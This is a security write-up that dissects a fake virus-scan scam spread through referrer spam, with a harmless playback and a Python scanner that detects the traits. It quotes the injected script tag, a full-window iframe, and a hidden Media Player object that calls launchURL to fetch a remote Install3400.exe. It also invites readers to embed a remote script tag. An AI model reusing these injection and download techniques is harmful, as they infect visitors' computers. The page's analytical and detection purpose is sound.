W.O.P.R Playback of virus scanning and download of removal tool


An example of how the users are tempted to download malware

To take the playback and see what the users see, activate this link: Scanner Playback of a faked virus scan ending with a request to download.

A description of the process

There are various methods to attract the user. It can be referrer spam or blog spam, but the end result is the same. In this case the story started with referrer spam. A bot (IP address 66.199.250.98) left this URL in the statistics: h t t p : //xoomer.alice.it/mapquestinf/mapquest-directions.html (Notice that xoomer.alice.it resolves to 62.211.68.12, so it is just a placeholder.) The goal is to tempt the web administrator to click on the URL in the statistics, thereby redirecting him to infected sites.

What happens if you click the link, or are taken there by accident

When, or rather if, you click on the link, you will get the following HTML. Actually, this is a leftover from somewhere in the past, since xoomer.alice.it has moved. A probe for headers at xoomer.alice.it shows that the site has moved around. It looks like an innocent HTML page with some maps and directions, but let's invoke The Linkchecker.

Hey, what's that? According to the header probes for xoomer.alice.it, it should have moved. Let's look at the Javascript probe from The Linkchecker. Notice that this Javascript

<script src="h t t p://scanner.malwarealarms.com/5.1/startup.php?advid=3400"></script>

is (was) injected right after the <body> tag. It looks like an innocent advertisement, but in fact it is where the whole show starts.

Let's take a deeper look at the Javascript. An interesting thing here is that at this initial stage they only target MS IE users, notice: if (is_IE) { ... and specifically XP with Service Pack 2: if (is_XP_SP2) { ...

The initial endpoint to the malware is h t t p://xscanner.malwarealarms.com/a/Install3400.exe. It is the initial malware, and when installed it will download another program to your PC.

But it is not over yet; the show goes on. Look at this part of the Javascript:

var promourl = "h t t p://scanner.malwarealarm.com/5.1/?advid=3400";
document.writeln("<iframe name='myFrame' src='" + promourl + " etc.

This makes an <iframe> filling the whole window. By doing it that way, the original URL is still displayed in the address bar.

Look also at this part:

if(is_XP_SP2) {
  var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
  document.write("<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>");
}

It creates a Media Player object (GUID 6BF52A52-394A-11D3-B153-00C04F79FAA6) with a size of 0x0 px. That means it is invisible to the user.

After creating the object, the malware .exe file is handed to the Media Player object here:

try { iie.launchURL("h t t p://xscanner.malwarealarms.com/a/Install3400.exe"); }

Now the real show starts with the above mentioned <iframe>; let's take a look at that. First a look at the headers. In this <iframe> there is the Javascript virus scan simulator. The plain HTML without Javascript looks like this. The Javascript files used are:
  1. common.js
  2. fileslist.js
  3. progressbar.js
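The traits described above (an external script directly after <body>, a 0x0 <object> created by CLSID, a full-window <iframe> from another host, and a URL handed to launchURL) are easy to check for in a saved copy of a page. The following scanner is an added example, not part of the original playback; the sample HTML is constructed here with placeholder hostnames, and only the CLSID is the one quoted in the text.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the injection described on this page (not the real site).
SAMPLE_HTML = """<html><body>
<script src="http://scanner.example.invalid/5.1/startup.php?advid=3400"></script>
<h1>Driving directions</h1><p>Some map text.</p>
<object id=iie width=0 height=0 classid='CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'></object>
<script>try { iie.launchURL("http://xscanner.example.invalid/a/Install3400.exe"); } catch(e) {}</script>
<iframe name='myFrame' src='http://scanner.example.invalid/5.1/?advid=3400' width='100%' height='100%'></iframe>
</body></html>"""

def attr(tag, name):
    """Return the value of attribute `name` inside one HTML tag, or None if absent."""
    m = re.search(r"\b%s\s*=\s*['\"]?([^'\"\s>]+)" % re.escape(name), tag, re.I)
    return m.group(1) if m else None

def find_indicators(html, page_host):
    """Flag the four traits the write-up describes; returns a list of (kind, detail)."""
    found = []
    # 1. a script fetched from another host, placed directly after <body>
    m = re.search(r"<body[^>]*>\s*(<script[^>]*>)", html, re.I)
    if m:
        src = attr(m.group(1), "src")
        if src and urlparse(src).hostname not in (None, page_host):
            found.append(("script_after_body", src))
    # 2. an <object> sized 0x0 (invisible to the user) that instantiates a COM class by CLSID
    for m in re.finditer(r"<object\b[^>]*>", html, re.I):
        tag = m.group(0)
        if attr(tag, "width") == "0" and attr(tag, "height") == "0":
            found.append(("hidden_object", attr(tag, "classid")))
    # 3. a full-window iframe from another host: the address bar keeps showing the original URL
    for m in re.finditer(r"<iframe\b[^>]*>", html, re.I):
        tag = m.group(0)
        src = attr(tag, "src")
        if src and urlparse(src).hostname != page_host \
                and attr(tag, "width") == "100%" and attr(tag, "height") == "100%":
            found.append(("fullwindow_iframe", src))
    # 4. inline script passing a URL to an ActiveX method such as launchURL
    for m in re.finditer(r"launchURL\(\s*['\"]([^'\"]+)", html):
        found.append(("launchurl", m.group(1)))
    return found

if __name__ == "__main__":
    for kind, detail in find_indicators(SAMPLE_HTML, "maps.example.invalid"):
        print(kind, detail)
```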

The playback - .exe file

This playback is based on the actual HTML and Javascript, BUT the endpoint is of course not malware. Instead it is a little program written in Delphi that just calls ShowMessage. It will show a little popup to illustrate that the program was executed, and the source code is:
program endpoint;

uses
  Dialogs;

begin
  { Harmless stand-in for the real payload: only shows a message box }
  ShowMessage('Hey, you has just been infected');
end.

The playback

Instead of using the original infected site, I made a little, almost empty page to illustrate. Since this is a Javascript injection it will only be activated when Javascript is enabled, so you can play it with or without Javascript. NOTICE: although you are being redirected, the main URL in the address bar remains the SAME. If you want to try this at home, make a simple HTML file and insert this tag right after the body tag: <script src="http://wopr.float4you.com/xoomer/scanner.playback/playback.startup.js.asp?advid=3400"></script> It is the same as the one used in this playback. It is made as an .ASP file to illustrate hiding the .js extension, but for the readers' sake I kept .js in the name, so one will know it is a Javascript file. Save the file on your local disk, or on your own website, and see what happens when you open it.